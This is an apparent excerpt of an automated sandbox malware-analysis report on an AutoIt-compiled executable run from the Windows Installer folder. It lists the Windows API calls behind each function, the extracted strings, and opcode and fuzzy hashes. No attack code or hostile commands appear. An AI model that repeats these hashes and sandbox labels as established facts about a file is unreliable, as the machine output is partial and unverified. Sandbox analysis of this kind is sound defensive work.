                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_memmove
                                        • String ID:
                                        • API String ID: 3033907384-0
                                        • Opcode ID: a436cbd6dcac87135454901e5b69c03fe746761f357b709c427a55c99aebb0cb
                                        • Instruction ID: 15c128476bf16c8bf9e0edbab950132b396298af340b7bf3846e48b45e5eb042
                                        • Opcode Fuzzy Hash: a436cbd6dcac87135454901e5b69c03fe746761f357b709c427a55c99aebb0cb
                                        • Instruction Fuzzy Hash: 763107B26002016BDB2A9B74E846B2BB7D9EF44310F14553AF95ACF690EB32E950C751
                                        APIs
                                        • __FF_MSGBANNER.LIBCMT ref: 00344603
                                          • Part of subcall function 00348E52: __NMSG_WRITE.LIBCMT ref: 00348E79
                                          • Part of subcall function 00348E52: __NMSG_WRITE.LIBCMT ref: 00348E83
                                        • __NMSG_WRITE.LIBCMT ref: 0034460A
                                          • Part of subcall function 00348EB2: GetModuleFileNameW.KERNEL32(00000000,003E0312,00000104,?,00000001,00340127), ref: 00348F44
                                          • Part of subcall function 00348EB2: ___crtMessageBoxW.LIBCMT ref: 00348FF2
                                          • Part of subcall function 00341D65: ___crtCorExitProcess.LIBCMT ref: 00341D6B
                                          • Part of subcall function 00341D65: ExitProcess.KERNEL32 ref: 00341D74
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        • RtlAllocateHeap.NTDLL(017C0000,00000000,00000001), ref: 0034462F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                        • String ID:
                                        • API String ID: 1372826849-0
                                        • Opcode ID: f5969fd899f77e1d4dd3ba2ca6d2efa37b7effb1ee8ad5de3f72bfb3b1e60d35
                                        • Instruction ID: 7c82d8372a6605a38142d105dd1dacfd4e25c636c0c46b7314d1f7ea67d2903c
                                        • Opcode Fuzzy Hash: f5969fd899f77e1d4dd3ba2ca6d2efa37b7effb1ee8ad5de3f72bfb3b1e60d35
                                        • Instruction Fuzzy Hash: 02019231602201AAE6277B74AC42B6E33CCEB83761F530135F5059F1D2DFB8BC818A64
                                        APIs
                                        • TranslateMessage.USER32(?), ref: 0032E646
                                        • DispatchMessageW.USER32(?), ref: 0032E651
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0032E664
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 4217535847-0
                                        • Opcode ID: 721c8da75ac9c904711c6a34e8afede6f4ef0cbb39ceecb269f7ac94d89e1889
                                        • Instruction ID: 681900887f97bd78d91ab118cd7a1c077a94f48a91470ce86fba60dae31103c2
                                        • Opcode Fuzzy Hash: 721c8da75ac9c904711c6a34e8afede6f4ef0cbb39ceecb269f7ac94d89e1889
                                        • Instruction Fuzzy Hash: 60F01C766043559BDB62EAE19D8ABABB3DDBB94740F490C2DF642C6190EBB0D4048722
                                        APIs
                                        • _free.LIBCMT ref: 0036C45E
                                          • Part of subcall function 003428CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00348715,00000000,003488A3,00344673,?), ref: 003428DE
                                          • Part of subcall function 003428CA: GetLastError.KERNEL32(00000000,?,00348715,00000000,003488A3,00344673,?), ref: 003428F0
                                        • _free.LIBCMT ref: 0036C46F
                                        • _free.LIBCMT ref: 0036C481
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                        • Instruction ID: 1486c8196e64320c9accf6a4275effeabafeadc1f5f90c3575f2b2daa7b1ee7b
                                        • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                        • Instruction Fuzzy Hash: D8E017A161570196CA27EA7BA854BBB63CC6F04761B55982EF489EF186DF28F8408138
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CALL
                                        • API String ID: 0-4196123274
                                        • Opcode ID: 0e882adaddb37483a00aafce6786750ad14ba960b898c94c5929ed82541faca6
                                        • Instruction ID: 2fdb4d25268aafc51cbb68db15b794f6669dc1f9054d99051c9bfb82efb5ab55
                                        • Opcode Fuzzy Hash: 0e882adaddb37483a00aafce6786750ad14ba960b898c94c5929ed82541faca6
                                        • Instruction Fuzzy Hash: E0228C74608340CFDB2ADF14C4A1A6AB7E5FF84304F15896DE99A8B661D731EC84CF82
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: EA06
                                        • API String ID: 4104443479-3962188686
                                        • Opcode ID: 3ecd03a39e1b98d1b49f92102dcc8b2ea5f809811619885e236ddc0fbcdb9572
                                        • Instruction ID: 209856e8da25d25c235179dc20a1716969fee2aec11031263b008b74e64149f0
                                        • Opcode Fuzzy Hash: 3ecd03a39e1b98d1b49f92102dcc8b2ea5f809811619885e236ddc0fbcdb9572
                                        • Instruction Fuzzy Hash: 84419C31A041749BCF138B64ECA17BEBFA69B55300F19C465EA829F282C631ADD087A1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscmp
                                        • String ID: 0.0.0.0
                                        • API String ID: 856254489-3771769585
                                        • Opcode ID: 608d43c644dbb04fdd9057e79698cdc36b817d7da5363bb0b8402ff20959dbe4
                                        • Instruction ID: 724056d1607b593703b1bf9e166969927c0b7e6b2429cedc4f848e6139a91ee8
                                        • Opcode Fuzzy Hash: 608d43c644dbb04fdd9057e79698cdc36b817d7da5363bb0b8402ff20959dbe4
                                        • Instruction Fuzzy Hash: F0110639700214DFCB1AEF54D991EA9B3E9AF84714B00C059F609AF791DA74ED41CBA0
                                        APIs
                                        • _memset.LIBCMT ref: 00393CF1
                                          • Part of subcall function 003231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003231DA
                                          • Part of subcall function 00323A67: SHGetMalloc.SHELL32(1<2), ref: 00323A7D
                                          • Part of subcall function 00323A67: SHGetDesktopFolder.SHELL32(?), ref: 00323A8F
                                          • Part of subcall function 00323A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00323AD2
                                          • Part of subcall function 00323B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,003E22E8,?), ref: 00323B65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                        • String ID: X
                                        • API String ID: 2727075218-3081909835
                                        • Opcode ID: 253f05db1adc7408adfc68a043873b01a96648e5ef960f00d65008810b454358
                                        • Instruction ID: d5a398f8bb82c16b1b89a6728e0147293bffbe1859780c50dd4886ec2ce0505b
                                        • Opcode Fuzzy Hash: 253f05db1adc7408adfc68a043873b01a96648e5ef960f00d65008810b454358
                                        • Instruction Fuzzy Hash: 71118AB1A10298ABCF06DFD4E8456DE7BFDAF45704F04400AE501BF341DBB95A498BA1
                                        Strings
                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 003934AA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                        • API String ID: 1029625771-2684727018
                                        • Opcode ID: b413400bfb629f5f3dbdfb5f248d7fc48a156773cd84a35316a362591a7e7f41
                                        • Instruction ID: 804b304cbbd981ce92c99661a82d863089d9705c8f200575cb7ffe015f141cf1
                                        • Opcode Fuzzy Hash: b413400bfb629f5f3dbdfb5f248d7fc48a156773cd84a35316a362591a7e7f41
                                        • Instruction Fuzzy Hash: 45F0687190121DBE8F13FFB5D8518FFB7BCAA10300B118526F81596081EB389B09CB61
                                        APIs
                                          • Part of subcall function 00366623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,0036685E,?,?,?,00394A5C,003BE448,00000003,?,?), ref: 003666E2
                                        • WriteFile.KERNEL32(?,?,">,00000000,00000000,?,?,?,00394A5C,003BE448,00000003,?,?,00324C44,?,?), ref: 0036686C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$PointerWrite
                                        • String ID: ">
                                        • API String ID: 539440098-2195902231
                                        • Opcode ID: f2b4a30a4a33a4ce19e0e4be9f8c40c1ccbda5d0a17fa9ea71e221c1957406e1
                                        • Instruction ID: 6e57d132dcc31e968299a865ce8240e37381a7dc759a7fc158a1303f92545ad8
                                        • Opcode Fuzzy Hash: f2b4a30a4a33a4ce19e0e4be9f8c40c1ccbda5d0a17fa9ea71e221c1957406e1
                                        • Instruction Fuzzy Hash: 6FE04636000208BBDB21AF94E801A8ABBBCEB04350F00451AF94295010D7B5AE149BA4
                                        APIs
                                          • Part of subcall function 0032193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00321952
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0035E3AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: @U=u
                                        • API String ID: 1777923405-2594219639
                                        • Opcode ID: 382ffd0c4030309e6231d8f9540af99d3af7f573e0ca908b02d9b71742f46d30
                                        • Instruction ID: fe46ea8cb2d69cf15368ded9852429a6b6c091f3ad3e2656ae6dbfba6b1aa6ad
                                        • Opcode Fuzzy Hash: 382ffd0c4030309e6231d8f9540af99d3af7f573e0ca908b02d9b71742f46d30
                                        • Instruction Fuzzy Hash: F0D01235144120AAFA766F14FD06FC177969B41751F120459B9816B0F5C7D25C815580
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b344951f7e23dd6caf10966960425e8a87dcf098a05282f5c22cc8fe8d1a80a
                                        • Instruction ID: 2e9d914cc0be5150c5e6ed9dde74b402fd502247688c7626241155104517e6b6
                                        • Opcode Fuzzy Hash: 3b344951f7e23dd6caf10966960425e8a87dcf098a05282f5c22cc8fe8d1a80a
                                        • Instruction Fuzzy Hash: 9B51D5316043019FCB16EF28D4D1BAA73E5AF89310F54856DF9968F292DB30ED45CB91
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00378074
                                        • GetForegroundWindow.USER32 ref: 0037807A
                                          • Part of subcall function 00376B19: GetWindowRect.USER32(?,?), ref: 00376B2C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$CursorForegroundRect
                                        • String ID:
                                        • API String ID: 1066937146-0
                                        • Opcode ID: e75e2c9bae540d4067ff2e1b81aa48dbe38c1c61f002c9341e64bbc63fde529a
                                        • Instruction ID: d1b1bb85cab55f670752ce170f8e0ff635a3916c8ee1e37ef24c997d3bbf0625
                                        • Opcode Fuzzy Hash: e75e2c9bae540d4067ff2e1b81aa48dbe38c1c61f002c9341e64bbc63fde529a
                                        • Instruction Fuzzy Hash: 0C313475A00218AFDB12EFA4DC85AEEB7B8FF14314F508429F946AB251DB34AE45CB50
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 0039DB31
                                        • IsWindow.USER32(00000000), ref: 0039DB6B
                                          • Part of subcall function 00321F04: GetForegroundWindow.USER32 ref: 00321FBE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Similarity
                                        • API ID: Window$Foreground
                                        • String ID:
                                        • API String ID: 62970417-0
                                        • Opcode ID: 5af77ce80281c8f72209476c51de3b619007b65366f708da7f8372a04813281b
                                        • Instruction ID: e798bc93bb328b326ffb4a85f7c1d2d848cf9118dfbae75d36242709233134a1
                                        • Opcode Fuzzy Hash: 5af77ce80281c8f72209476c51de3b619007b65366f708da7f8372a04813281b
                                        • Instruction Fuzzy Hash: EA21DF72600206BBDB22AF34DC81BFEB7AD9F80784F124429F95ACB141DB74EE019760
                                        APIs
                                        • 74BFC8D0.UXTHEME ref: 003236E6
                                          • Part of subcall function 00342025: __lock.LIBCMT ref: 0034202B
                                          • Part of subcall function 003232DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003232F6
                                          • Part of subcall function 003232DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0032330B
                                          • Part of subcall function 0032374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0032376D
                                          • Part of subcall function 0032374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0032377F
                                          • Part of subcall function 0032374E: GetFullPathNameW.KERNEL32(C:\Windows\Installer\MSI4976.tmp,00000104,?,003E1120,C:\Windows\Installer\MSI4976.tmp,003E1124,?,?), ref: 003237EE
                                          • Part of subcall function 0032374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00323860
                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00323726
                                        Similarity
                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                        • String ID:
                                        • API String ID: 3809921791-0
                                        • Opcode ID: 1cc7e031dc84bc159670a80748c00e89daf5f296be9a30f33730441e12e72b88
                                        • Instruction ID: 7187f65d29c43aef77a6b6ae23babd68d7ffa9ed9a556ab827971e602927b320
                                        • Opcode Fuzzy Hash: 1cc7e031dc84bc159670a80748c00e89daf5f296be9a30f33730441e12e72b88
                                        • Instruction Fuzzy Hash: 20118E719083919BC722DF29E88591BFBECEB85750F00461EF4858B2A1DB709A44CF92
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00324C2B,?,?,?,?,0032BE63), ref: 00324BB6
                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00324C2B,?,?,?,?,0032BE63), ref: 00394972
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 86591dab9e3ba3c9d18e7adb6af16c7c575234a0226864762f3f922dfdaf9ac8
                                        • Instruction ID: d094a3e7a26db196c958b9194c2442716ec5561c93e9dc005da0c2a15bd3dcfe
                                        • Opcode Fuzzy Hash: 86591dab9e3ba3c9d18e7adb6af16c7c575234a0226864762f3f922dfdaf9ac8
                                        • Instruction Fuzzy Hash: 6D01B170248318BEF7364E24DC8AF667BDCEB05B68F108319BAE56A1E0C6B09C45CB50
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0036AEA5,?,?,00000000,00000008), ref: 0033F282
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0036AEA5,?,?,00000000,00000008), ref: 0033F2A6
                                          • Part of subcall function 0033F2D0: _memmove.LIBCMT ref: 0033F307
                                        Similarity
                                        • API ID: ByteCharMultiWide$_memmove
                                        • String ID:
                                        • API String ID: 3033907384-0
                                        • Opcode ID: 0b0d4f02337926ba9fd0a98a64671dee5c366982df95fec868719f63b1f7a066
                                        • Instruction ID: 8dddc25afe0bc01572cea83dbc3d9ef11a86aaaba40cd8e38985506b66d0ac6e
                                        • Opcode Fuzzy Hash: 0b0d4f02337926ba9fd0a98a64671dee5c366982df95fec868719f63b1f7a066
                                        • Instruction Fuzzy Hash: 9FF04FBA504114BFAB12AB65DC84CBB7FADEF8A360B408426FD09CE111CA31DC018770
                                        APIs
                                        • ___lock_fhandle.LIBCMT ref: 0034F7D9
                                        • __close_nolock.LIBCMT ref: 0034F7F2
                                          • Part of subcall function 0034886A: __getptd_noexit.LIBCMT ref: 0034886A
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        Similarity
                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                        • String ID:
                                        • API String ID: 1046115767-0
                                        • Opcode ID: a567a58d57c3f8f5bc0fc224f848b41c6c13cc4e0dae405db6e8e6144638e2d1
                                        • Instruction ID: b622337bd3c871cda8a30229a2c2534ee9602ee058c1df5fa10c04feef78fae6
                                        • Opcode Fuzzy Hash: a567a58d57c3f8f5bc0fc224f848b41c6c13cc4e0dae405db6e8e6144638e2d1
                                        • Instruction Fuzzy Hash: 87118272C05A548ED7137FA4D88235D7AD49F41331F5A0360E4706F1E3DBB4B9418AA1
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0032352A
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • _wcscat.LIBCMT ref: 003966C0
                                        Similarity
                                        • API ID: FullNamePath_memmove_wcscat
                                        • String ID:
                                        • API String ID: 257928180-0
                                        • Opcode ID: 34ce661aeeabdde6e0189a092bbde9d06d537bd5e4ea56d4563d72261f240793
                                        • Instruction ID: a5f18f6302e623030e425bec44bfb18a5b105cba8e1740602f98088437b0a59a
